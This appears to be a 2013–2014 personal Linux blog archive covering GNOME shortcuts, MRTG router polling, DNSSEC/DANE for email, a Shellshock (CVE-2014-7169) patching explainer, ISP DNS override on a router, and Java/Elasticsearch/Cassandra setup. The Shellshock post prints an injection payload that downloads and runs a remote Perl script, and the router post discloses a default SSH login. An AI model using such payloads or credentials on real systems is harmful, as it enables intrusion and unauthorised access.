Showing posts with label bash. Show all posts
Showing posts with label bash. Show all posts

Saturday, December 6, 2014

Gnome goodies: common keyboard shortcut. Remembering state of num lock.

If you have been using linux and there is a key on your keyboard with windows logo, it is known as Super key. This super key will be widely used in gnome 3. Today, we will learn some of the commonly used keyboard shortcut. You can also find other keyboard shortcut in gnome-control-center keyboard shortcut.

Keyboard ShortcutDescription
Super+UpMaximize window
Super+DownUnmaximaze window
Super+Left ArrowFill half to the left side of the screen
Super+Right ArrowFill half to the right side of the screen
Super+click then moveMove window anywhere on screen
Super+mTo bring up a message tray at the bottom of the screen.
alt+tabswitch between applications
alt+`switch through window of current applications.
superbring up a new apperance known as activities overview
drag application to dashthis is to add an application which you used often to the dash so you can easily accessed.
drop application to gridremove application from dash by dragging from dash and then drop into the grid
ctrl+alt+up arrowswitch to the workspace above
type in a file windowTo quickly search for file in the file windows.
alt+PrintScntake a screenshot of the current window only.
shift+PrintScnselect a specific area of the screen.

Not sure why each time of operating system reboot, the state of num lock on keyboard get forgotten. This is really quite puzzling considering gnome has been evolve for so many cycle. But that's okay, we will learn to configure gnome so that it will remember the state of num lock between system boot. Let's launch dconf-editor and expand in the tree in such path. org -> gnome -> settings-daemon -> peripherals -> keyboard. Check remember-numlock-state and check the screenshot below.


With this article, I hope you navigate better in gnome-shell environment.

Friday, December 5, 2014

Poll statistics from Asus router RT-N14UH through http and plot in mrtg

If you have Asus router model RT-N14UHP, you should probably read on. This is a pretty decent router capable for a lot of feature including supporting qos and ipv6. It's pretty odd somehow this router does not come preinstall with net-snmp package. For your information, snmp allow a device to be poll for statistics collection purposes.


I have been requesting to poll statistics from the router using snmp from asus support some time around September 2014. The response I got is the development has taken this request however there is no guarantee when it would be made available. I have taken a deeper look into if the router support net-snmp. Google around and check if someone has similar problem and done it before unfortunately there is none as of this writing. There are a few come closer, this and this. The idea is to make the router by mounting an USB disk and then router will install ipkg (a package manager for the router). By using ipkg, you can install package net-snmp however, the package will be install on the mounted USB drive rather than the router itself. That's a pity if usb disk is unmounted, then thing will not work. Example of command below:
user@RT-N14UHP:/asusware# ipkg install net-snmp
Installing net-snmp ( to /opt/...
Configuring net-snmp
Successfully terminated.

user@RT-N14UHP:/asusware# net-snmp yes
Restarting the package...

Today, we will try differently. We will poll statistics from the router through http and then plot the graph using the well known software, mrtg. MRTG by default poll device for statistics using snmp. However, it also allow data collection using script, that's something very nifty! Let's start by installing this package in the client.
$ sudo apt-get install mrtg apache2

The package apache is for you to access the graph via browser. There should a cron running every five minute, /etc/cron.d/mrtg . So statistics will always be poll and graph will always be generate and update. Configuration for apache2 and where mrtg is accessible from web is left an exercises for you. (Hint : apache by default place in /var/www).

Create a script that will poll statistics from the router. Below is the script and you can download this bash script, and place it in /bin/

There are a few configuration you need to change. The obvious is the router IP. This router has IP, so change to your router IP. hwaddr is the hardware address of eth0 in your router. To get hwaddr from your router, you need to enable telnet from the router web graphic user interface and then login from command line. Then issue the command such as below.
user@RT-N14UHP:/tmp/home/root# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 40:40:40:40:40:40 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::1234:1234:1234:1234/64 scope link 
       valid_lft forever preferred_lft forever

the value for field link/ether will be the value for hwaddr in the url. To get the value of http_id, issue the command such as below in the router terminal.
admin@RT-N14UHP:/www# nvram get http_id

Then install firefox live http header plugin and then start it, when the browser is pointed to router url and successfully logged in, then a line such as below should be identified. Use the string after Basic and fill into the url.
Authorization: Basic YGG3333d3BjMTQ5PPP=

With all these changed, the script is good to go. Next, we will configure mrtg configuration file.
### Global Config Options

#  for Debian
WorkDir: /var/www/router

### Global Defaults

#  to get bits instead of bytes and graphs growing to the right
# Options[_]: growright, bits
Options[_]: growright

EnableIPv6: no

Target[router-to-inet_1]: `/bin/`
MaxBytes[router-to-inet_1]: 700000
Title[router-to-inet_1]: Network traffic between router and internet
PageTop[router-to-inet_1]: <h1>Network traffic between router and internet</h1>

It's a pretty simple configuration file and you can place it in /etc/mrtg.conf. The one that need some explanation, probably is This is actually the script that generated the statistics from the router. The script is placed in /bin and you can place anywhere as long as mrtg has the permission to execute this file. Note that the script you amended previously is actually get used by mrtg here. For the parameter in the configuration file, you can find more explanation here.

Now in the terminal, executed this script,
user@localhost:~# env LANG=C /usr/bin/mrtg /etc/mrtg.cfg
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup could not read the primary log file for router-to-inet_1
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup The backup log file for router-to-inet_1 was invalid as well
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup Can't rename router-to-inet_1.log to router-to-inet_1.old updating log file
user@localhost:~# env LANG=C /usr/bin/mrtg /etc/mrtg.cfg

Don't know why there is error, it is probably initialization but next command execution should finish without any error. Now check in web server, directory, by default in debian for mrtg, it is in
user@localhost:/var/www/router$ ls
mrtg-l.png  mrtg-r.png        router-to-inet_1.html  router-to-inet_1-month.png  router-to-inet_1-week.png
mrtg-m.png  router-to-inet_1-day.png  router-to-inet_1.log   router-to-inet_1.old  router-to-inet_1-year.png

A few files should have been generated. That's good. When you installed package mrtg, a cron should installed by default at /etc/cron.d/mrtg. Take a look at the following:
*/5 * * * * root if [ -x /usr/bin/mrtg ] && [ -r /etc/mrtg.cfg ] && [ -d "$(grep '^[[:space:]]*[^#]*[[:space:]]*WorkDir' /etc/mrtg.cfg | awk '{ print $NF }')" ]; then mkdir -p /var/log/mrtg ; env LANG=C /usr/bin/mrtg /etc/mrtg.cfg 2>&1 | tee -a /var/log/mrtg/mrtg.log ; fi

So every five minute, the statistics will get collected. If you do not have this, just make a cron file. That's it, now point your browser to the web server url, example for mine,


I hope you find it useful for you too.

UPDATE : You can also find the source file here,

Saturday, November 15, 2014

Implementing DNSSEC and DANE for email - Step by step

Note, this article is written and contributed by a good friend gryphius, so all credit goes to him. I'm just copy and paste his awesome work here. :-)

After various breaches at the certificate authorities it has become clear that we need a way to authenticate a server certificate without the need to trust a third party. “DNS-based Authentication of Named Entities“ (DANE) makes this possible by publishing the certificate in the DNS. Find more information about DANE here.

In this tutorial we show an example implementation of DANE for email delivery.

What you need

  • a DNSSEC capable nameserver (in this example: powerdns)
  • a DNSSEC capable registrar  (in this example:
  • a mail server with TLS Support (in this example: postfix )
  • to test the secured email delivery: a second mailserver with DANE support ( postfix >=2.11, DNSSEC capable resolver )
We start off with a postfix server already configured to accept mail for our domain, but no TLS support so far. Let’s add this now by generating a self-signed certificate:
in this state, a sending server can encrypt the transmission, but it can not verify the self-signed server certificate, so it  will treat the TLS connection as anonymous:
postfix/smtp[13330]: Anonymous TLS connection established to[...]:25: TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)
In order to enable DANE support, our domain’s DNS zone must be secured with DNSSEC. Our example domain is hosted on a powerdns authoritative server securing a zone on a current powerdns is pretty easy:

The key from the last command must be copied to the registrar. At the form to add a DNSSEC key looks like this:


Once the key is added and synchronized on the registry’s DNS servers, you can test DNSSEC funconality at

Now, back on the mailserver hosting our domain we have to create a hash of the SSL-certificate:

Using this value  we can add the DANE TLSA record for our mailserver in the DNS zone:

In powerdns, add a record: (replace with your real mx hostname)
Content3 0 1 02059728e52f9a58a235584e1ed70bd2b51a44024452ec2ba0166e8fb1d1d32b

the “3 0 1” means: “we took a full domain-issued certificate, and created a sha256 hash of it”. For other possible values see RFC6698 section 7.2 – 7.4.

Now we can test the new DANE TLSA records at

And finally, let’s test it from another postfix box. For this to work, the sending server must use a DNSSEC resolver (for example unbound) and postfix >=2.11 with DANE enabled:

and voilĂ , our connection is now verified even though we’re using a self-signed certificate:

postfix/smtp[17787]: Verified TLS connection established to[...]:25: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)


Saturday, October 25, 2014

Why is CVE-2014-7169 is important and you should patch your system

Recently I have come across this link and read about it. Before we go into the details. Let's understand what is it.

From Red Hat errata

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

So let's check my system. Hmm.. my local host is affected :-)
jason@localhost:~$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
this is a test
jason@localhost:~$ whoami

But what is this important? the user still using his own privileged. It turn out to be this exploit allow remote attacker to execute the script remotely. Let's change the script a bit.
() { :;}; /bin/bash -c "cd /tmp;wget;curl -O ; perl /tmp/jur;rm -rf /tmp/jur"

See the point? Does it look scarry? A remote script is downloaded to your system, and execute it. So any local services that use shell for interpretation basically is vulnerable and you should patch bash as soon as possible. As of this moment of writing, the patch is out. In CentOS 7, the patched is included in the package bash-4.2.45-5.el7_0.4.x86_64. Read the changelog below.
* Thu Sep 25 2014 Ondrej Oprala <> - 4.2.45-5.4
- CVE-2014-7169
Resolves: #1146324

Below are some service which uses bash and if your system use some of it, you should know what to do.

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

  • PHP scripts executed with mod_php are not affected even if they spawn subshells.

  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

  • Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Thanks, that's it for this article. Be good and stay safe.

Sunday, January 26, 2014

Overwrite tmnet DNS in router DIR-615

In the past, I have read into how the site was "blocked" in Malaysia where web surfers unable to load some websites. I don't know what is the fuss about it as it certainly create a lot of talks in the social websites. The term blocked would probably be at IP level where if the access by a machine to a address of IP a.b.c.d is unreachable, then that is a really blocked. But the funny things is, some ISPs in malaysia do not actually blocked the IPs but merely make some hostname unable to resolve into IP.

So in this article, I'm gonna show you how you can get back your freedom. There are many public DNS out there. Just google public DNS would give you a lot of list. In fact, google has public DNS too. When you choose the DNS, be sure it is public trust able and speed of your machine to the DNS server is matter when you want a quick web browser able to determine the IP address quickly.

With that said, I'm gonna show you how you can overwrite the DNS entries in tmnet router DIR-615. You need to ssh to your router in order to accomplish this. I have tried many times in the web interface, though it has text box for you to specify, apparently you cannot specify to the list that you want, it always default to tmnet DNS. This is annoying!

What you need is a terminal, ssh program installed, username = operator , password = h566UniFi

After you have ssh into the router, these are all the steps you need to do.
# cat /var/etc/resolv.conf
# This file is generated by gen_resolv.php

# sed 's/' -i /var/etc/resolv.conf
# sed 's/' -i /var/etc/resolv.conf
# cat resolv.conf
# This file is generated by gen_resolv.php

So I have an internal IP because there is a internal DNS service running. would be the google public DNS.

Well, that's all you need, the site where it is unable to resolve to an IP, you can check by ping to the hostname, it should return a valid IP. That's all folks, I hope you learn something and gain back your right.

Wednesday, December 25, 2013

Lightweight Java Game Library

Since childhood, gaming has been one of my favorite activities. If you are from 80s, Supermario should sound familiar to you. =) 30 years had passed, gaming development improve tremendously over the period.

In this article, we are going to explore gaming development. Most of the gaming is written in low level languages, example C and thus, it is very complicated. This certainly introduced steep learning curve if you are a beginner. Hence, we will choose a simple startup to learn about gaming development. A example of library that can be use is Lightweight Java Game Library or its acronym LWJGL.

What is Lightweight Java Game Library?

The Lightweight Java Game Library (LWJGL) is a solution aimed directly at professional and amateur Java programmers alike to enable commercial quality games to be written in Java. LWJGL provides developers access to high performance crossplatform libraries such as OpenGL (Open Graphics Library), OpenCL (Open Computing Language) and OpenAL (Open Audio Library) allowing for state of the art 3D games and 3D sound. Additionally LWJGL provides access to controllers such as Gamepads, Steering wheel and Joysticks. All in a simple and straight forward API.

Because nature of this library deal with graphic display, hence the hardware display driver must be setup correctly. For me, my workstation is using ati radeon, and using xserver-xorg-video-radeon and enable 3D acceleration with package libgl1-mesa-dri. We won't delve deep into graphic driver installation and configuration since our focus here is the gaming development. You can check if your drive is setup properly by running glxgears via a terminal. If a windows popup with three gears spinning, your driver install and setup should be fine to continue for this coding tutorial.

In the official wiki, it is well written and documented to get you started. With this, I have setup my eclipse environment in debian sid. The library needed to should be setup in the project build path so when you run your application, the library is detected. Because I'm running linux, the native library location is pointed to lwjgl-2.9.1/native/linux. These two library must be configured before any development begin. If you noticed, I've setup the source as well, it will be convienient to read the code if you need to be sure later down the road during coding phase.

There are many tutorials to pick from, as a start, I just pick the basics - LWJGL Basics 1 (The Display).  The source code should be in the link, and it is incredibly easy to create the display with few lines of codes and I got that window display with just initial try. Very impressive and promising.

It is pretty impressive what this library can do. There are many examples that come in the library and one of it is an example game. Just execute
java -cp .:res:jar/lwjgl.jar:jar/lwjgl_test.jar:jar/lwjgl_util.jar:jar/jinput.jar: -Djava.library.path=native/linux org.lwjgl.examples.spaceinvaders.Game

if you are running linux. Run fine in my environment and played the bundle game; amazing. Maybe in my next article, I'm gonna try to even complete this .

Monday, December 23, 2013

Elasticsearch index slow log for search and indexing

Today, we are going to learn on the logging for elasticsearch for its search and index. In elasticsearch config file, elasticsearch.yml, it should have a configuration such as below:
################################## Slow Log ##################################

# Shard level query and fetch threshold logging. 10s 5s 2s 500ms 1s 800ms 500ms 200ms

#index.indexing.slowlog.threshold.index.warn: 10s 5s
#index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

So with this example, I have enable tracing for search query and search fetch with 500ms and 200ms respectively. A search in elasticsearch consists of query time and fetch time. Hence the two configuration for search. Meanwhile, logging for elasticsearch index is also enable with a threshold of 500ms.

With these configuration sets, and if your indexing or search exceed that threshold,
an entry will be log into a file. The logging file should be located in path.log
that is set in elasticsearch.yml.

So what does the number really means? Excerpts from elasticsearch official documentation

The logging is done on the shard level scope, meaning the executionof a search request within a specific shard. It does not encompass the whole search request, which can be broadcast to several shards in order to execute. Some of the benefits of shard level logging is the association of the actual execution on the specific machine, compared with request level.


All settings are index level settings (and each index can have different values for it), and can be changed in runtime using the indexupdate settings API.


... and, I have tried updating the index setting via a simple tool I've made earlier on. But the idea is same, you just need to http get by putting the variable into the index setting. You can find more information here The key for the configuration is available at class.
[jason@node1 bin]$ ./ set search.slowlog.threshold.query.trace 500
"ok" : true,
"acknowledged" : true

[2013-12-23 12:31:12,758][TRACE][] [node1] [index_test][146] took[1s], took_millis[1026], types[foo,bar], stats[], search_type[QUERY_THEN_FETCH], total_shards[90], source[{"size":80,"timeout":10000,"query":{"filtered":{"query":{"query_string":{"query":"maxis*","default_operator":"and"}},"filter":{"and":{"filters":[{"query":{"match":{"site":{"query":"","type":"boolean"}}}},{"range":{"unixtimestamp":{"from":null,"to":1387825199000,"include_lower":true,"include_upper":true}}}]}}}},"filter":{"query":{"match":{"site":{"query":"","type":"boolean"}}}},"sort":[{"unixtimestamp":{"order":"desc"}}]}], extra_source[],

With this example, it has exceed the threshold set at 500ms which it ran for 1 second.

As for indexing, the fundamental concept is the same, so we won't elaborate in this article and that should leave you as a tutorial. :-)

Saturday, December 21, 2013

vifm a true gem

filemanager goes vim

  * A ncurse file manager, with vim like UI for a vim user you will feel right
at home, command like the dd delete line just like in vim, and move to other
window and type p past the line in the "clipboard" to it. And the normal move
command like the hjkl works as expected jk down/up item in list and hl
up/down directory. like in vim most settings are made in it's rc file, the
vifmrc is in ~/.vifm to get an idea about all the option you have in vifm go
to it's amazing what you can do
with vifm, if you like me has been using vim for sometime this filemanager is
a true gem. And much like vim, the options are "endless" browse on the project
homepage or at You will find the sourcecode/setup and help to make your own
setup. I often look at the config/setup on github to get idea's and mabye
improve my setup.

* On is the documentation for vifm.

* I must say after using vifm for some time, and done some github'ing made my
own vifmrc some nice filetype setting and hard-bookmarks, it's like vim the
more you use it, and add to your rc file the better and faster it get.

  * So thanks to ksteen & xaizek for this power-tool.
Don't look as much, but it is ;)

Tuesday, October 15, 2013

cassandra 2.0 catch 101 - part1 - correct cassandra Unsupported major.minor version 51.0

This is another series of my journey to cassandra 2.0, if you have not read the previous post, you should read here

As cassandra 2.0 required jdk 7.0 or later, if your system has jdk 6 running and configure, it is still possible to run cassandra 2.0 with jdk7, that is to make them co-exists. Download jdk and extract to the directory, e.g. /usr/lib/jvm. add JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04/ to /etc/default/cassandra. This should export the variable JAVA_HOME to your environment so that jdk 7 is used to start the cassandra successfully.

Because the above setting is set to work for cassandra instance only, for the admin tools that come with it, we will set another environment for it. This make sure we don't break our existing work. If you want the environment to work only for yourself, then you should create a file in your home directory. $HOME/ . Below are the content.
. /usr/share/cassandra/

This first line is the same as previously but the second line, we source the additional environment setting for the admin tools so that it can find the java classes. With that done, you should not get the error Unsupported major.minor version 51.0 below anymore!
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/cassandra/tools/NodeCmd : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClassCond(
at java.lang.ClassLoader.defineClass(
at Method)
at java.lang.ClassLoader.loadClass(
at sun.misc.Launcher$AppClassLoader.loadClass(
at java.lang.ClassLoader.loadClass(
Could not find the main class: Program will exit.